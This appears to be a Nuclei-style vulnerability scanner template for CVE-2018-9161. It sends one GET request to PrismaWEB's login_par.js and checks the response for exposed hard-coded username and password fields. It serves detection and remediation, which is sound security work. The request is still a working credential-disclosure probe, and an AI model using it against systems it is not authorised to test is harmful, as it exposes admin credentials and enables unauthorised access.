45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2018-9161
|
|
|
|
info:
|
|
name: PrismaWEB - Credentials Disclosure
|
|
author: gy741
|
|
severity: critical
|
|
description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
|
|
remediation: |
|
|
Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files.
|
|
reference:
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-9161
|
|
- https://www.exploit-db.com/exploits/44276/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-9161
|
|
cwe-id: CWE-798
|
|
epss-score: 0.26342
|
|
epss-percentile: 0.96273
|
|
cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: prismaindustriale
|
|
product: checkweigher_prismaweb
|
|
tags: cve,cve2018,prismaweb,exposure,edb,prismaindustriale
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/user/scripts/login_par.js"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'txtChkUser'
|
|
- 'txtChkPassword'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022064056402a395eafb68395527f03b019744d5e561569f74e4fdee4545c80f529302200ff15d3c8ed3fbf8fb25f34202ee38a88aa876f58608cb393d9ae47ea7576607:922c64590222798bb761d5b6d8e72950 |